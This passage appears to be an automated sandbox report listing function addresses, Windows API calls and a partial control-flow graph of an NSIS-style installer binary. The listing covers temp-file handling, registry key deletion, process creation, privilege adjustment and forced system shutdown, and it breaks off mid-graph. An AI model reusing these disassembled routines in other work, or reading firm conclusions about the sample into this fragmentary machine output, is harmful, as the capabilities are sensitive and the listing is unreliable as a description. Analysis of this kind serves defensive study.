5219->5220 5221 40642b 5 API calls 5220->5221 5222 401f74 5221->5222 5222->5216 5226 405f9c wsprintfW 5222->5226 5224 401fa9 5227 405f9c wsprintfW 5224->5227 5226->5224 5227->5216 5228 40149e 5229 402288 5228->5229 5230 4014ac PostQuitMessage 5228->5230 5230->5229 5231 40249e 5232 402cc9 19 API calls 5231->5232 5233 4024a8 5232->5233 5234 402ba2 18 API calls 5233->5234 5235 4024b1 5234->5235 5236 4024d5 RegEnumValueW 5235->5236 5237 4024c9 RegEnumKeyW 5235->5237 5239 40281e 5235->5239 5238 4024ee RegCloseKey 5236->5238 5236->5239 5237->5238 5238->5239 5241 40231f 5242 402324 5241->5242 5243 40234f 5241->5243 5244 402cc9 19 API calls 5242->5244 5245 402bbf 18 API calls 5243->5245 5246 40232b 5244->5246 5247 402356 5245->5247 5248 402bbf 18 API calls 5246->5248 5251 40236c 5246->5251 5252 402bff RegOpenKeyExW 5247->5252 5249 40233c RegDeleteValueW RegCloseKey 5248->5249 5249->5251 5259 402c76 5252->5259 5260 402c2a 5252->5260 5253 402c50 RegEnumKeyW 5254 402c62 RegCloseKey 5253->5254 5253->5260 5256 40642b 5 API calls 5254->5256 5255 402c87 RegCloseKey 5255->5259 5258 402c72 5256->5258 5257 402bff 5 API calls 5257->5260 5258->5259 5261 402ca2 RegDeleteKeyW 5258->5261 5259->5251 5260->5253 5260->5254 5260->5255 5260->5257 5261->5259 3716 4032a0 SetErrorMode GetVersion 3717 4032d4 3716->3717 3718 4032da 3716->3718 3719 40642b 5 API calls 3717->3719 3807 4063bf GetSystemDirectoryW 3718->3807 3719->3718 3721 4032f1 3722 4063bf 3 API calls 3721->3722 3723 4032fb 3722->3723 3724 4063bf 3 API calls 3723->3724 3725 403305 3724->3725 3810 40642b GetModuleHandleA 3725->3810 3728 40642b 5 API calls 3729 403313 #17 OleInitialize SHGetFileInfoW 3728->3729 3816 406055 lstrcpynW 3729->3816 3731 403350 GetCommandLineW 3817 406055 lstrcpynW 3731->3817 3733 403362 GetModuleHandleW 3734 40337a 3733->3734 3818 405a36 3734->3818 3737 4034b4 GetTempPathW 3822 40326f 3737->3822 3739 4034cc 3740 4034d0 GetWindowsDirectoryW lstrcatW 3739->3740 3741 403526 DeleteFileW 3739->3741 3743 40326f 12 API calls 3740->3743 3832 402dee GetTickCount GetModuleFileNameW 3741->3832 3742 4033a2 3744 405a36 CharNextW 3742->3744 3749 40349d 3742->3749 3751 40349f 3742->3751 3747 4034ec 3743->3747 3744->3742 3746 40353a 3753 405a36 CharNextW 3746->3753 3789 4035dd 3746->3789 3802 4035ed 3746->3802 3747->3741 3748 4034f0 GetTempPathW lstrcatW SetEnvironmentVariableW SetEnvironmentVariableW 3747->3748 3752 40326f 12 API calls 3748->3752 3749->3737 3916 406055 lstrcpynW 3751->3916 3757 40351e 3752->3757 3770 403559 3753->3770 3757->3741 3757->3802 3758 403728 3761 403730 GetCurrentProcess OpenProcessToken 3758->3761 3762 4037ac ExitProcess 3758->3762 3759 403608 3940 40579a 3759->3940 3767 403748 LookupPrivilegeValueW AdjustTokenPrivileges 3761->3767 3768 40377c 3761->3768 3764 4035b7 3917 405b11 3764->3917 3765 40361e 3944 40571d 3765->3944 3767->3768 3769 40642b 5 API calls 3768->3769 3784 403783 3769->3784 3770->3764 3770->3765 3775 403798 ExitWindowsEx 3775->3762 3779 4037a5 3775->3779 3776 403634 lstrcatW 3777 40363f lstrcatW lstrcmpiW 3776->3777 3778 40365b 3777->3778 3777->3802 3782 403660 3778->3782 3783 403667 3778->3783 3982 40140b 3779->3982 3781 4035d2 3932 406055 lstrcpynW 3781->3932 3947 405683 CreateDirectoryW 3782->3947 3952 405700 CreateDirectoryW 3783->3952 3784->3775 3784->3779 3860 40389e 3789->3860 3791 40366c SetCurrentDirectoryW 3792 403687 3791->3792 3793 40367c 3791->3793 3956 406055 lstrcpynW 3792->3956 3955 406055 lstrcpynW 3793->3955 3798 4036d3 CopyFileW 3804 403695 3798->3804 3799 40371c 3801 405ef6 38 API calls 3799->3801 3801->3802 3933 4037c4 3802->3933 3803 406077 18 API calls 3803->3804 3804->3799 3804->3803 3806 403707 CloseHandle 3804->3806 3957 406077 3804->3957 3975 405ef6 MoveFileExW 3804->3975 3979 405735 CreateProcessW 3804->3979 3806->3804 3808 4063e1 wsprintfW LoadLibraryW 3807->3808 3808->3721 3811 406451 GetProcAddress 3810->3811 3812 406447 3810->3812 3814 40330c 3811->3814 3813 4063bf 3 API calls 3812->3813 3815 40644d 3813->3815 3814->3728 3815->3811 3815->3814 3816->3731 3817->3733 3819 405a3c 3818->3819 3820 403389 CharNextW 3819->3820 3821 405a43 CharNextW 3819->3821 3820->3737 3820->3742 3821->3819 3985 4062e9 3822->3985 3824 403285 3824->3739 3825 40327b 3825->3824 3994 405a09 lstrlenW CharPrevW 3825->3994 3828 405700 2 API calls 3829 403293 3828->3829 3997 405c59 3829->3997 4001 405c2a GetFileAttributesW CreateFileW 3832->4001 3834 402e2e 3853 402e3e 3834->3853 4002 406055 lstrcpynW 3834->4002 3836 402e54 4003 405a55 lstrlenW 3836->4003 3840 402e65 GetFileSize 3841 402f61 3840->3841 3859 402e7c 3840->3859 4008 402d8a 3841->4008 3843 402f6a 3845 402f9a GlobalAlloc 3843->3845 3843->3853 4043 403258 SetFilePointer 3843->4043 4019 403258 SetFilePointer 3845->4019 3846 402fcd 3850 402d8a 6 API calls 3846->3850 3849 402fb5 4020 403027 3849->4020 3850->3853 3851 402f83 3854 403242 ReadFile 3851->3854 3853->3746 3856 402f8e 3854->3856 3855 402d8a 6 API calls 3855->3859 3856->3845 3856->3853 3857 402fc1 3857->3853 3857->3857 3858 402ffe SetFilePointer 3857->3858 3858->3853 3859->3841 3859->3846 3859->3853 3859->3855 4040 403242 3859->4040 3861 40642b 5 API calls 3860->3861 3862 4038b2 3861->3862 3863 4038b8 GetUserDefaultUILanguage 3862->3863 3864 4038ca 3862->3864 4064 405f9c wsprintfW 3863->4064 4074 405f22 RegOpenKeyExW 3864->4074 3867 4038c8 4065 403b74 3867->4065 3869 403919 lstrcatW 3869->3867 3870 405f22 3 API calls 3870->3869 3873 405b11 18 API calls 3874 40394b 3873->3874 3875 4039df 3874->3875 3877 405f22 3 API calls 3874->3877 3876 405b11 18 API calls 3875->3876 3878 4039e5 3876->3878 3879 40397d 3877->3879 3880 4039f5 LoadImageW 3878->3880 3881 406077 18 API calls 3878->3881 3879->3875 3884 40399e lstrlenW 3879->3884 3888 405a36 CharNextW 3879->3888 3882 403a9b 3880->3882 3883 403a1c RegisterClassW 3880->3883 3881->3880 3887 40140b 2 API calls 3882->3887 3885 403a52 SystemParametersInfoW CreateWindowExW 3883->3885 3886 403aa5 3883->3886 3889 4039d2 3884->3889 3890 4039ac lstrcmpiW 3884->3890 3885->3882 3886->3802 3891 403aa1 3887->3891 3892 40399b 3888->3892 3894 405a09 3 API calls 3889->3894 3890->3889 3893 4039bc GetFileAttributesW 3890->3893 3891->3886 3896 403b74 19 API calls 3891->3896 3892->3884 3895 4039c8 3893->3895 3897 4039d8 3894->3897 3895->3889 3899 405a55 2 API calls 3895->3899 3900 403ab2 3896->3900 4079 406055 lstrcpynW 3897->4079 3899->3889 3901 403b41 3900->3901 3902 403abe ShowWindow 3900->3902 4080 405287 OleInitialize 3901->4080 3903 4063bf 3 API calls 3902->3903 3905 403ad6 3903->3905 3907 403ae4 GetClassInfoW 3905->3907 3910 4063bf 3 API calls 3905->3910 3906 403b47 3908 403b63 3906->3908 3909 403b4b 3906->3909 3912 403af8 GetClassInfoW RegisterClassW 3907->3912 3913 403b0e DialogBoxParamW 3907->3913 3911 40140b 2 API calls 3908->3911 3909->3886 3914 40140b 2 API calls 3909->3914 3910->3907 3911->3886 3912->3913 3915 40140b 2 API calls 3913->3915 3914->3886 3915->3886 3916->3749 4095 406055 lstrcpynW 3917->4095 3919 405b22 4096 405ab4 CharNextW CharNextW 3919->4096 3922 4035c3 3922->3802 3931 406055 lstrcpynW 3922->3931 3923 4062e9 5 API calls 3924 405b38 3923->3924 3924->3922 3925 405b69 lstrlenW 3924->3925 3930 405a55 2 API calls 3924->3930 4102 406398 FindFirstFileW 3924->4102 3925->3924 3926 405b74 3925->3926 3927 405a09 3 API calls 3926->3927 3929 405b79 GetFileAttributesW 3927->3929 3929->3922 3930->3925 3931->3781 3932->3789 3934 4037dc 3933->3934 3935 4037ce CloseHandle 3933->3935 4105 403809 3934->4105 3935->3934 3941 4057af 3940->3941 3942 4057c3 MessageBoxIndirectW 3941->3942 3943 403616 ExitProcess 3941->3943 3942->3943 3945 40642b 5 API calls 3944->3945 3946 403623 lstrcatW 3945->3946 3946->3776 3946->3777 3948 403665 3947->3948 3949 4056d4 GetLastError 3947->3949 3948->3791 3949->3948 3950 4056e3 SetFileSecurityW 3949->3950 3950->3948 3951 4056f9 GetLastError 3950->3951 3951->3948 3953 405710 3952->3953 3954 405714 GetLastError 3952->3954 3953->3791 3954->3953 3955->3792 3956->3804 3966 406084 3957->3966 3958 4062cf 3959 4036c6 DeleteFileW 3958->3959 4164 406055 lstrcpynW 3958->4164 3959->3798 3959->3804 3961 406137 GetVersion 3961->3966 3962 40629d lstrlenW 3962->3966 3965 406077 10 API calls 3965->3962 3966->3958 3966->3961 3966->3962 3966->3965 3967 405f22 3 API calls 3966->3967 3968 4061b2 GetSystemDirectoryW 3966->3968 3969 4061c5 GetWindowsDirectoryW 3966->3969 3970 4062e9 5 API calls 3966->3970 3971 4061f9 SHGetSpecialFolderLocation 3966->3971 3972 406077 10 API calls 3966->3972 3973 40623e lstrcatW 3966->3973 4162 405f9c wsprintfW 3966->4162 4163 406055 lstrcpynW 3966->4163 3967->3966 3968->3966 3969->3966 3970->3966 3971->3966 3974 406211 SHGetPathFromIDListW CoTaskMemFree 3971->3974 3972->3966 3973->3966 3974->3966 3976 405f17 3975->3976 3977 405f0a 3975->3977 3976->3804 4165 405d84 lstrcpyW 3977->4165 3980 405774 3979->3980 3981 405768 CloseHandle 3979->3981 3980->3804 3981->3980 3983 401389 2 API calls 3982->3983 3984 401420 3983->3984 3984->3762 3992 4062f6 3985->3992 3986 40636c 3987 406371 CharPrevW 3986->3987 3989 406392 3986->3989 3987->3986 3988 40635f CharNextW 3988->3986 3988->3992 3989->3825 3990 405a36 CharNextW 3990->3992 3991 40634b CharNextW 3991->3992 3992->3986 3992->3988 3992->3990 3992->3991 3993 40635a CharNextW 3992->3993 3993->3988 3995 40328d 3994->3995 3996 405a25 lstrcatW 3994->3996 3995->3828 3996->3995 3998 405c66 GetTickCount GetTempFileNameW 3997->3998 3999 40329e 3998->3999 4000 405c9c 3998->4000 3999->3739 4000->3998 4000->3999 4001->3834 4002->3836 4004 405a63 4003->4004 4005 402e5a 4004->4005 4006 405a69 CharPrevW 4004->4006 4007 406055 lstrcpynW 4005->4007 4006->4004 4006->4005 4007->3840 4009 402d93 4008->4009 4010 402dab 4008->4010 4011 402da3 4009->4011 4012 402d9c DestroyWindow 4009->4012 4013 402db3 4010->4013 4014 402dbb GetTickCount 4010->4014 4011->3843 4012->4011 4044 406467 4013->4044 4016 402dc9 CreateDialogParamW ShowWindow 4014->4016 4017 402dec 4014->4017 4016->4017 4017->3843 4019->3849 4021 403040 4020->4021 4022 40306e 4021->4022 4050 403258 SetFilePointer 4021->4050 4024 403242 ReadFile 4022->4024 4025 403079 4024->4025 4026 4031db 4025->4026 4027 40308b GetTickCount 4025->4027 4035 4031c5 4025->4035 4028 40321d 4026->4028 4033 4031df 4026->4033 4027->4035 4039 4030da 4027->4039 4029 403242 ReadFile 4028->4029 4029->4035 4030 403242 ReadFile 4030->4039 4031 403242 ReadFile 4031->4033 4032 405cdc WriteFile 4032->4033 4033->4031 4033->4032 4033->4035 4034 403130 GetTickCount 4034->4039 4035->3857 4036 403155 MulDiv wsprintfW 4051 4051b4 4036->4051 4039->4030 4039->4034 4039->4035 4039->4036 4048 405cdc WriteFile 4039->4048 4062 405cad ReadFile 4040->4062 4043->3851 4045 406484 PeekMessageW 4044->4045 4046 402db9 4045->4046 4047 40647a DispatchMessageW 4045->4047 4046->3843 4047->4045 4049 405cfa 4048->4049 4049->4039 4050->4022 4052 405271 4051->4052 4053 4051cf 4051->4053 4052->4039 4054 4051eb lstrlenW 4053->4054 4057 406077 18 API calls 4053->4057 4055 405214 4054->4055 4056 4051f9 lstrlenW 4054->4056 4059 405227 4055->4059 4060 40521a SetWindowTextW 4055->4060 4056->4052 4058 40520b lstrcatW 4056->4058 4057->4054 4058->4055 4059->4052 4061 40522d SendMessageW SendMessageW SendMessageW 4059->4061 4060->4059 4061->4052 4063 403255 4062->4063 4063->3859 4064->3867 4066 403b88 4065->4066 4087 405f9c wsprintfW 4066->4087 4068 403bf9 4069 406077 18 API calls 4068->4069 4070 403c05 SetWindowTextW 4069->4070 4071 403c21 4070->4071 4072 403929 4070->4072 4071->4072 4073 406077 18 API calls 4071->4073 4072->3873 4073->4071 4075 4038fa 4074->4075 4076 405f56 RegQueryValueExW 4074->4076 4075->3869 4075->3870 4078 405f77 RegCloseKey 4076->4078 4078->4075 4079->3875 4088 404165 4080->4088 4082 4052aa 4086 4052d1 4082->4086 4091 401389 4082->4091 4083 404165 SendMessageW 4084 4052e3 OleUninitialize 4083->4084 4084->3906 4086->4083 4087->4068 4089 40417d 4088->4089 4090 40416e SendMessageW 4088->4090 4089->4082 4090->4089 4093 401390 4091->4093 4092 4013fe 4092->4082 4093->4092 4094 4013cb MulDiv SendMessageW 4093->4094 4094->4093 4095->3919 4097 405ad1 4096->4097 4098 405ae3 4096->4098 4097->4098 4099 405ade CharNextW 4097->4099 4100 405b07 4098->4100 4101 405a36 CharNextW 4098->4101 4099->4100 4100->3922 4100->3923 4101->4098 4103 4063b9 4102->4103 4104 4063ae FindClose 4102->4104 4103->3924 4104->4103 4106 403817 4105->4106 4107 4037e1 4106->4107 4108 40381c FreeLibrary GlobalFree 4106->4108 4109 405846 4107->4109 4108->4107 4108->4108 4110 405b11 18 API calls 4109->4110 4111 405866 4110->4111 4112 405885 4111->4112 4113 40586e DeleteFileW 4111->4113 4115 4059b0 4112->4115 4149 406055 lstrcpynW 4112->4149 4114 4035f6 OleUninitialize 4113->4114 4114->3758 4114->3759 4115->4114 4120 406398 2 API calls 4115->4120 4117 4058ab 4118 4058b1 lstrcatW 4117->4118 4119 4058be 4117->4119 4121 4058c4 4118->4121 4122 405a55 2 API calls 4119->4122 4125 4059ca 4120->4125 4123 4058d4 lstrcatW 4121->4123 4124 4058ca 4121->4124 4122->4121 4126 4058df lstrlenW FindFirstFileW 4123->4126 4124->4123 4124->4126 4125->4114 4127 4059ce 4125->4127 4128 405901 4126->4128 4129 4059a5 4126->4129 4130 405a09 3 API calls 4127->4130 4132 405988 FindNextFileW 4128->4132 4142 405846 62 API calls 4128->4142 4144 4051b4 25 API calls 4128->4144 4146 4051b4 25 API calls 4128->4146 4148 405ef6 38 API calls 4128->4148 4150 406055 lstrcpynW 4128->4150 4151 4057fe 4128->4151 4129->4115 4131 4059d4 4130->4131 4133 4057fe 5 API calls 4131->4133 4132->4128 4136 40599e FindClose 4132->4136 4135 4059e0 4133->4135 4137 4059e4 4135->4137 4138 4059fa 4135->4138 4136->4129 4137->4114 4141 4051b4 25 API calls 4137->4141 4139 4051b4 25 API calls 4138->4139 4139->4114 4143 4059f1 4141->4143 4142->4128 4145 405ef6 38 API calls 4143->4145 4144->4132 4147 4059f8 4145->4147 4146->4128 4147->4114 4148->4128 4149->4117 4150->4128 4159 405c05 GetFileAttributesW 4151->4159 4154 40582b 4154->4128 4155 405821 DeleteFileW 4157 405827 4155->4157 4156 405819 RemoveDirectoryW 4156->4157 4157->4154 4158 405837 SetFileAttributesW 4157->4158 4158->4154 4160 40580a 4159->4160 4161 405c17 SetFileAttributesW 4159->4161 4160->4154 4160->4155 4160->4156 4161->4160 4162->3966 4163->3966 4164->3959 4166 405dd2 GetShortPathNameW 4165->4166 4167 405dac 4165->4167 4169 405ef1 4166->4169 4170 405de7 4166->4170 4192 405c2a GetFileAttributesW CreateFileW 4167->4192 4169->3976 4170->4169 4172 405def wsprintfA 4170->4172 4171 405db6 CloseHandle GetShortPathNameW 4171->4169 4173 405dca 4171->4173 4174 406077 18 API calls 4172->4174 4173->4166 4173->4169 4175 405e17 4174->4175 4193 405c2a GetFileAttributesW CreateFileW 4175->4193 4177 405e24 4177->4169 4178 405e33 GetFileSize GlobalAlloc 4177->4178 4179 405e55 4178->4179 4180 405eea CloseHandle 4178->4180 4181 405cad ReadFile 4179->4181 4180->4169 4182 405e5d 4181->4182 4182->4180 4194 405b8f lstrlenA 4182->4194 4185 405e74 lstrcpyA 4188 405e96 4185->4188 4186 405e88 4187 405b8f 4 API calls 4186->4187 4187->4188 4189 405ecd SetFilePointer 4188->4189 4190 405cdc WriteFile 4189->4190 4191 405ee3 GlobalFree 4190->4191 4191->4180 4192->4171 4193->4177 4195 405bd0 lstrlenA 4194->4195 4196 405ba9 lstrcmpiA 4195->4196 4198 405bd8 4195->4198 4197 405bc7 CharNextA 4196->4197 4196->4198 4197->4195 4198->4185 4198->4186 5262 100010e1 5265 10001111 5262->5265 5263 100011d8 GlobalFree 5264 100012ba 2 API calls 5264->5265 5265->5263 5265->5264 5266 100011d3 5265->5266 5267 10001272 2 API calls 5265->5267 5268 10001164 GlobalAlloc 5265->5268 5269 100011f8 GlobalFree 5265->5269 5270 100011c4 GlobalFree 5265->5270 5271 100012e1 lstrcpyW 5265->5271 5266->5263 5267->5270 5268->5265 5269->5265 5270->5265 5271->5265 5272 401ca3 5273 402ba2 18 API calls 5272->5273 5274 401ca9 IsWindow 5273->5274 5275 401a05 5274->5275 5276 402a27 SendMessageW 5277 402a41 InvalidateRect 5276->5277 5278 402a4c 5276->5278 5277->5278 4566 405128 4567 405138 4566->4567 4568 40514c 4566->4568 4570 405195 4567->4570 4571 40513e 4567->4571 4569 405154 IsWindowVisible 4568->4569 4578 405174 4568->4578 4569->4570 4573 405161 4569->4573 4574 40519a CallWindowProcW 4570->4574 4572 404165 SendMessageW 4571->4572 4575 405148 4572->4575 4580 404a7e SendMessageW 4573->4580 4574->4575 4578->4574 4585 404afe 4578->4585 4581 404aa1 GetMessagePos ScreenToClient SendMessageW 4580->4581 4582 404add SendMessageW 4580->4582 4583 404ad5 4581->4583 4584 404ada 4581->4584 4582->4583 4583->4578 4584->4582 4594 406055 lstrcpynW 4585->4594 4587 404b11 4595 405f9c wsprintfW 4587->4595 4589 404b1b 4590 40140b 2 API calls 4589->4590 4591 404b24 4590->4591 4596 406055 lstrcpynW 4591->4596 4593 404b2b 4593->4570 4594->4587 4595->4589 4596->4593 4597 40242a 4608 402cc9 4597->4608 4599 402434 4600 402bbf 18 API calls 4599->4600 4601 40243d 4600->4601 4602 402448 RegQueryValueExW 4601->4602 4603 40281e 4601->4603 4604 402468 4602->4604 4607 40246e RegCloseKey 4602->4607 4604->4607 4612 405f9c wsprintfW 4604->4612 4607->4603 4609 402bbf 18 API calls 4608->4609 4610 402ce2 4609->4610 4611 402cf0 RegOpenKeyExW 4610->4611 4611->4599 4612->4607 5279 40422d lstrcpynW lstrlenW 5280 40172d 5281 402bbf 18 API calls 5280->5281 5282 401734 SearchPathW 5281->5282 5283 40174f 5282->5283 4613 404b30 GetDlgItem GetDlgItem 4614 404b82 7 API calls 4613->4614 4617 404d9b 4613->4617 4615 404c25 DeleteObject 4614->4615 4616 404c18 SendMessageW 4614->4616 4618 404c2e 4615->4618 4616->4615 4624 404e60 4617->4624 4627 404e7f 4617->4627 4631 404dfb 4617->4631 4619 404c65 4618->4619 4620 404c3d 4618->4620 4621 404119 19 API calls 4619->4621 4623 406077 18 API calls 4620->4623 4625 404c79 4621->4625 4622 404f2b 4628 404f35 SendMessageW 4622->4628 4629 404f3d 4622->4629 4630 404c47 SendMessageW SendMessageW 4623->4630 4624->4627 4636 404e71 SendMessageW 4624->4636 4633 404119 19 API calls 4625->4633 4626 405113 4635 404180 8 API calls 4626->4635 4627->4622 4627->4626 4634 404ed8 SendMessageW 4627->4634 4628->4629 4637 404f56 4629->4637 4638 404f4f ImageList_Destroy 4629->4638 4645 404f66 4629->4645 4630->4618 4632 404a7e 5 API calls 4631->4632 4650 404e0c 4632->4650 4651 404c87 4633->4651 4634->4626 4640 404eed SendMessageW 4634->4640 4641 405121 4635->4641 4636->4627 4642 404f5f GlobalFree 4637->4642 4637->4645 4638->4637 4639 4050d5 4639->4626 4646 4050e7 ShowWindow GetDlgItem ShowWindow 4639->4646 4644 404f00 4640->4644 4642->4645 4643 404d5c GetWindowLongW SetWindowLongW 4647 404d75 4643->4647 4655 404f11 SendMessageW 4644->4655 4645->4639 4660 404afe 4 API calls 4645->4660 4663 404fa1 4645->4663 4646->4626 4648 404d93 4647->4648 4649 404d7b ShowWindow 4647->4649 4670 40414e SendMessageW 4648->4670 4669 40414e SendMessageW 4649->4669 4650->4624 4651->4643 4654 404cd7 SendMessageW 4651->4654 4656 404d56 4651->4656 4658 404d13 SendMessageW 4651->4658 4659 404d24 SendMessageW 4651->4659 4654->4651 4655->4622 4656->4643 4656->4647 4657 404d8e 4657->4626 4658->4651 4659->4651 4660->4663 4661 4050ab InvalidateRect 4661->4639 4662 4050c1 4661->4662 4671 404a39 4662->4671 4664 404fcf SendMessageW 4663->4664 4665 404fe5 4663->4665 4664->4665 4665->4661 4666 405046 4665->4666 4668 405059 SendMessageW SendMessageW 4665->4668 4666->4668 4668->4665 4669->4657 4670->4617 4674 404970 4671->4674 4673 404a4e 4673->4639 4675 404989 4674->4675 4676 406077 18 API calls 4675->4676 4677 4049ed 4676->4677 4678 406077 18 API calls 4677->4678 4679 4049f8 4678->4679 4680 406077 18 API calls 4679->4680 4681 404a0e lstrlenW wsprintfW SetDlgItemTextW 4680->4681 4681->4673 5284 4045b4 5285 4045e0 5284->5285 5286 4045f1 5284->5286 5345 40577e GetDlgItemTextW 5285->5345 5287 4045fd GetDlgItem 5286->5287 5290 40465c 5286->5290 5289 404611 5287->5289 5294 404625 SetWindowTextW 5289->5294 5297 405ab4 4 API calls 5289->5297 5291 404740 5290->5291 5299 406077 18 API calls 5290->5299 5343 4048ef 5290->5343 5291->5343 5347 40577e GetDlgItemTextW 5291->5347 5292 4045eb 5293 4062e9 5 API calls 5292->5293 5293->5286 5298 404119 19 API calls 5294->5298 5296 404180 8 API calls 5301 404903 5296->5301 5302 40461b 5297->5302 5303 404641 5298->5303 5304 4046d0 SHBrowseForFolderW 5299->5304 5300 404770 5305 405b11 18 API calls 5300->5305 5302->5294 5309 405a09 3 API calls 5302->5309 5306 404119 19 API calls 5303->5306 5304->5291 5307 4046e8 CoTaskMemFree 5304->5307 5308 404776 5305->5308 5310 40464f 5306->5310 5311 405a09 3 API calls 5307->5311 5348 406055 lstrcpynW 5308->5348 5309->5294 5346 40414e SendMessageW 5310->5346 5319 4046f5 5311->5319 5314 404655 5318 40642b 5 API calls 5314->5318 5315 40472c SetDlgItemTextW 5315->5291 5316 40478d 5317 40642b 5 API calls 5316->5317 5326 404794 5317->5326 5318->5290 5319->5315 5320 406077 18 API calls 5319->5320 5321 404714 lstrcmpiW 5320->5321 5321->5315 5323 404725 lstrcatW 5321->5323 5322 4047d5 5349 406055 lstrcpynW 5322->5349 5323->5315 5325 4047dc 5327 405ab4 4 API calls 5325->5327 5326->5322 5331 405a55 2 API calls 5326->5331 5332 40482d 5326->5332 5328 4047e2 GetDiskFreeSpaceW 5327->5328 5330 404806 MulDiv 5328->5330 5328->5332 5330->5332 5331->5326 5333 40489e 5332->5333 5335 404a39 21 API calls 5332->5335 5334 4048c1 5333->5334 5336 40140b 2 API calls 5333->5336 5350 40413b EnableWindow 5334->5350 5337 40488b 5335->5337 5336->5334 5338 4048a0 SetDlgItemTextW 5337->5338 5339 404890 5337->5339 5338->5333 5341 404970 21 API calls 5339->5341 5341->5333 5342 4048dd 5342->5343 5351 404549 5342->5351 5343->5296 5345->5292 5346->5314 5347->5300 5348->5316 5349->5325 5350->5342 5352 404557 5351->5352 5353 40455c SendMessageW 5351->5353 5352->5353 5353->5343 5354 4027b4 5355 4027ba 5354->5355 5356 4027c2 FindClose 5355->5356 5357 402a4c 5355->5357 5356->5357 5358 4042b6 5359 4042ce 5358->5359 5363 4043e8 5358->5363 5364 404119 19 API calls 5359->5364 5360 404452 5361 404524 5360->5361 5362 40445c GetDlgItem 5360->5362 5368 404180 8 API calls 5361->5368 5365 404476 5362->5365 5369 4044e5 5362->5369 5363->5360 5363->5361 5366 404423 GetDlgItem SendMessageW 5363->5366 5367 404335 5364->5367 5365->5369 5373 40449c 6 API calls 5365->5373 5389 40413b EnableWindow 5366->5389 5371 404119 19 API calls 5367->5371 5372 40451f 5368->5372 5369->5361 5374 4044f7 5369->5374 5378 404342 CheckDlgButton 5371->5378 5373->5369 5375 40450d 5374->5375 5376 4044fd SendMessageW 5374->5376 5375->5372 5379 404513 SendMessageW 5375->5379 5376->5375 5377 40444d 5380 404549 SendMessageW 5377->5380 5387 40413b EnableWindow 5378->5387 5379->5372 5380->5360 5382 404360 GetDlgItem 5388 40414e SendMessageW 5382->5388 5384 404376 SendMessageW 5385 404393 GetSysColor 5384->5385 5386 40439c SendMessageW SendMessageW lstrlenW SendMessageW SendMessageW 5384->5386 5385->5386 5386->5372 5387->5382 5388->5384 5389->5377 5390 401b37 5391 401b44 5390->5391 5392 401b88 5390->5392 5393 401bcd 5391->5393 5398 401b5b 5391->5398 5394 401bb2 GlobalAlloc 5392->5394 5395 401b8d 5392->5395 5397 406077 18 API calls 5393->5397 5405 402288 5393->5405 5396 406077 18 API calls 5394->5396 5395->5405 5411 406055 lstrcpynW 5395->5411 5396->5393 5399 402282 5397->5399 5409 406055 lstrcpynW 5398->5409 5403 40579a MessageBoxIndirectW 5399->5403 5402 401b9f GlobalFree 5402->5405 5403->5405 5404 401b6a 5410 406055 lstrcpynW 5404->5410 5407 401b79 5412 406055 lstrcpynW 5407->5412 5409->5404 5410->5407 5411->5402 5412->5405 5413 402537 5414 402562 5413->5414 5415 40254b 5413->5415 5417 402596 5414->5417 5418 402567 5414->5418 5416 402ba2 18 API calls 5415->5416 5425 402552 5416->5425 5419 402bbf 18 API calls 5417->5419 5420 402bbf 18 API calls 5418->5420 5421 40259d lstrlenW 5419->5421 5422 40256e WideCharToMultiByte lstrlenA 5420->5422 5421->5425 5422->5425 5423 4025ca 5424 4025e0 5423->5424 5426 405cdc WriteFile 5423->5426 5425->5423 5425->5424 5427 405d0b 5 API calls 5425->5427 5426->5424 5427->5423 5428 4014b8 5429 4014be 5428->5429 5430 401389 2 API calls 5429->5430 5431 4014c6 5430->5431 4710 4015b9 4711 402bbf 18 API calls 4710->4711 4712 4015c0 4711->4712 4713 405ab4 4 API calls 4712->4713 4725 4015c9 4713->4725 4714 401629 4715 40165b 4714->4715 4716 40162e 4714->4716 4720 401423 25 API calls 4715->4720 4718 401423 25 API calls 4716->4718 4717 405a36 CharNextW 4717->4725 4719 401635 4718->4719 4729 406055 lstrcpynW 4719->4729 4727 401653 4720->4727 4722 405700 2 API calls 4722->4725 4723 40571d 5 API calls 4723->4725 4724 401642 SetCurrentDirectoryW 4724->4727 4725->4714 4725->4717 4725->4722 4725->4723 4726 40160f GetFileAttributesW 4725->4726 4728 405683 4 API calls 4725->4728 4726->4725 4728->4725 4729->4724 5432 10002a7f 5433 10002a97 5432->5433 5434 1000158f 2 API calls 5433->5434 5435 10002ab2 5434->5435

                                                                                                                Control-flow Graph

                                                                                                                • Executed
                                                                                                                • Not Executed
                                                                                                                control_flow_graph 0 4032a0-4032d2 SetErrorMode GetVersion 1 4032d4-4032dc call 40642b 0->1 2 4032e5-403378 call 4063bf * 3 call 40642b * 2 #17 OleInitialize SHGetFileInfoW call 406055 GetCommandLineW call 406055 GetModuleHandleW 0->2 1->2 7 4032de 1->7 20 403382-40339c call 405a36 CharNextW 2->20 21 40337a-403381 2->21 7->2 24 4033a2-4033a8 20->24 25 4034b4-4034ce GetTempPathW call 40326f 20->25 21->20 27 4033b1-4033b7 24->27 28 4033aa-4033af 24->28 34 4034d0-4034ee GetWindowsDirectoryW lstrcatW call 40326f 25->34 35 403526-403540 DeleteFileW call 402dee 25->35 30 4033b9-4033bd 27->30 31 4033be-4033c2 27->31 28->27 28->28 30->31 32 403480-40348d call 405a36 31->32 33 4033c8-4033ce 31->33 53 403491-403497 32->53 54 40348f-403490 32->54 36 4033d0-4033d7 33->36 37 4033e8-403421 33->37 34->35 52 4034f0-403520 GetTempPathW lstrcatW SetEnvironmentVariableW * 2 call 40326f 34->52 48 4035f1-403602 call 4037c4 OleUninitialize 35->48 49 403546-40354c 35->49 42 4033d9-4033dc 36->42 43 4033de 36->43 44 403423-403428 37->44 45 40343e-403478 37->45 42->37 42->43 43->37 44->45 50 40342a-403432 44->50 45->32 51 40347a-40347e 45->51 71 403728-40372e 48->71 72 403608-403618 call 40579a ExitProcess 48->72 56 4035e1-4035e8 call 40389e 49->56 57 403552-40355d call 405a36 49->57 59 403434-403437 50->59 60 403439 50->60 51->32 61 40349f-4034ad call 406055 51->61 52->35 52->48 53->24 55 40349d 53->55 54->53 63 4034b2 55->63 70 4035ed 56->70 73 4035ab-4035b5 57->73 74 40355f-403594 57->74 59->45 59->60 60->45 61->63 63->25 70->48 76 403730-403746 GetCurrentProcess OpenProcessToken 71->76 77 4037ac-4037b4 71->77 81 4035b7-4035c5 call 405b11 73->81 82 40361e-403632 call 40571d lstrcatW 73->82 78 403596-40359a 74->78 84 403748-403776 LookupPrivilegeValueW AdjustTokenPrivileges 76->84 85 40377c-40378a call 40642b 76->85 79 4037b6 77->79 80 4037ba-4037be 